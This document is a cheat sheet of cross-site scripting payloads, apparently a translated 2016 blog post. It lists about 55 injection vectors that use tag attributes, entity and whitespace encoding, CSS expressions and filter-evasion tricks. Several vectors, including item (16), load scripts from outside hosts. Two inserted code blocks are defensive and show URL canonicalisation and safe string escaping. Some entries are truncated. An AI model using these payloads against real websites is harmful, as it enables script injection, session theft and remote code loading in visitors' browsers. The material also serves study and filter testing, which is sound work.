XSS Attack Summary
Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative ways to pop an alert

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript directive

<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (pops the alert)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Decimal Unicode entity encoding (pops the alert)

<IMG SRC=jav..omitted..S')>

(9) Decimal Unicode entities padded to 7 digits, without semicolons (pops the alert)

<IMG SRC=jav..omitted..S')>

(10) Hex entity encoding, also without semicolons (pops the alert)

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab splitting "javascript"

<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab splitting "javascript"

<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript, an extreme form of this XSS vector (one character per line)

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

(16) Working around per-field length limits (all fragments must land on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null byte

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2 (null bytes are basically ineffective domestically, because there is nowhere to exploit them)

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=" &#14;  javascript:alert('XSS');">
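Vectors (3) through (14), (17) and (19) all exist to defeat the same thing: a filter that searches for the literal text "javascript:". The following is an added example, not code from the original post, contrasting that check with one that first canonicalises the attribute value the way an HTML parser and URL parser do (decode numeric character references with or without semicolons, drop NUL and the other C0 controls, lowercase) and then compares the scheme against an allowlist. VECTORS are the SRC values copied from the items above; ALLOWED_SCHEMES and the decision to accept scheme-less relative URLs are this example's assumptions.

```javascript
// Added example, not part of the original post. Compares a literal
// "javascript:" blacklist with a canonicalise-then-allowlist check against
// the attribute values used in vectors (3)-(14), (17) and (19).

// The kind of check the payloads above are designed to slip past.
function naiveBlocksJavascriptUrl(value) {
  return value.includes("javascript:");
}

// Decode numeric character references the way an HTML parser does: decimal
// or hex, semicolon optional, leading zeros allowed (the 7-digit padding of
// vector (9) is just "&#0000106" and so on).
function decodeCharRefs(value) {
  return value.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, ref) => {
    const cp = /^x/i.test(ref) ? parseInt(ref.slice(1), 16) : parseInt(ref, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// Return the lowercased URL scheme after canonicalisation, or null when the
// value has no scheme (a relative URL). Browsers drop NUL, tab, CR, LF and
// the other C0 controls from a URL before reading the scheme, which is what
// the embedded-tab/newline/CR and NUL vectors rely on.
function canonicalScheme(value) {
  const decoded = decodeCharRefs(value);
  const stripped = decoded.replace(/[\u0000-\u0020]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(stripped);
  return m ? m[1].toLowerCase() : null;
}

// Allowlist the schemes you accept instead of blacklisting spellings of
// "javascript". Relative URLs (no scheme) are accepted here by assumption.
const ALLOWED_SCHEMES = new Set(["http", "https"]);

function isSafeUrlAttribute(value) {
  const scheme = canonicalScheme(value);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Attribute values copied from the vectors above (constructed test input).
const VECTORS = [
  "javascript:alert('XSS')",                                                      // (3)
  "JaVaScRiPt:alert('XSS')",                                                      // (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  // (5)
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29", // (10)
  "jav\tascript:alert('XSS');",                                                   // (11)
  "jav&#x09;ascript:alert('XSS');",                                               // (12)
  "jav&#x0A;ascript:alert('XSS');",                                               // (13)
  "jav&#x0D;ascript:alert('XSS');",                                               // (14)
  "java\u0000script:alert('XSS')",                                                // (17)
  " &#14;  javascript:alert('XSS');",                                             // (19)
];

// How many of the vectors each check stops.
function summarise(vectors) {
  return {
    naive: vectors.filter(naiveBlocksJavascriptUrl).length,
    canonical: vectors.filter((v) => !isSafeUrlAttribute(v)).length,
  };
}
```

The literal check stops only the two vectors that happen to spell "javascript:" verbatim; the canonicalising allowlist stops all ten, and still admits ordinary http/https and relative URLs. The same canonicalisation applies to CSS url() values such as vector (47), where the leading "&#1;" is likewise discarded by the parser.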
(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Breaking out of an escaped JavaScript string

\";alert('XSS');//
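Vector (29) targets a template that reflects user input into a JavaScript string literal and escapes only the double quote: the attacker's own backslash consumes the backslash the escaper adds, and the quote that follows terminates the literal. The block below is an added example, not code from the original post; it renders both a quote-only escaper and a hex-escaping one into the same template, then executes the result with alert() replaced by a stub that only records whether it was called. The template text and helper names are this example's assumptions.

```javascript
// Added example, not part of the original post: why vector (29) defeats a
// quote-only escaper, and what an escaper that survives it looks like.

// The weak escaper: doubles quotes only. The attacker supplies a backslash
// of their own, which "eats" the backslash this adds.
function escapeQuotesOnly(s) {
  return s.replace(/"/g, '\\"');
}

// The hardened escaper: every character outside [A-Za-z0-9] becomes \xHH,
// \uHHHH or \u{...}, so backslashes, both quote kinds, "<", ">", "&" and
// line terminators can never carry syntax in the enclosing literal or
// terminate the surrounding <script> element.
function escapeForJsString(s) {
  let out = "";
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    if (/[A-Za-z0-9]/.test(ch)) out += ch;
    else if (cp < 0x100) out += "\\x" + cp.toString(16).padStart(2, "0");
    else if (cp < 0x10000) out += "\\u" + cp.toString(16).padStart(4, "0");
    else out += "\\u{" + cp.toString(16) + "}";
  }
  return out;
}

// Render the template the way a server would, then execute it with alert()
// bound to a stub. Returns what the script observed: whether alert fired,
// what value `name` ended up holding, and whether the script even parsed.
function renderAndRun(escaper, userInput) {
  const source = 'var name = "' + escaper(userInput) + '"; return name;';
  let alertFired = false;
  const stubAlert = () => { alertFired = true; };
  try {
    const name = new Function("alert", source)(stubAlert);
    return { alertFired, name, syntaxError: false };
  } catch (e) {
    return { alertFired, name: undefined, syntaxError: e instanceof SyntaxError };
  }
}

// Vector (29) as a JavaScript string (constructed test input).
const ESCAPE_PAYLOAD = "\\\";alert('XSS');//";
```

With escapeQuotesOnly the rendered line is var name = "\\";alert('XSS');//"; the literal closes after the single backslash, alert runs, and the rest of the line is commented out. With escapeForJsString the same input renders as \x5c\x22\x3balert\x28\x27XSS\x27\x29\x3b\x2f\x2f, the script parses, alert never runs, and name holds the attacker's text exactly as supplied.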
(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input image

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) Style sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript

<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with an extra URL parameter

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra leading character (any of 1-32, 34, 39, 160, 8192-8193, 12288, 65279)

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (anything made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with a comment-split expression

exp/*<A STYLE='no\xss:noxss("*//*");
xss:&#x65;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that carries the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf" AllowScriptAccess="always"></EMBED>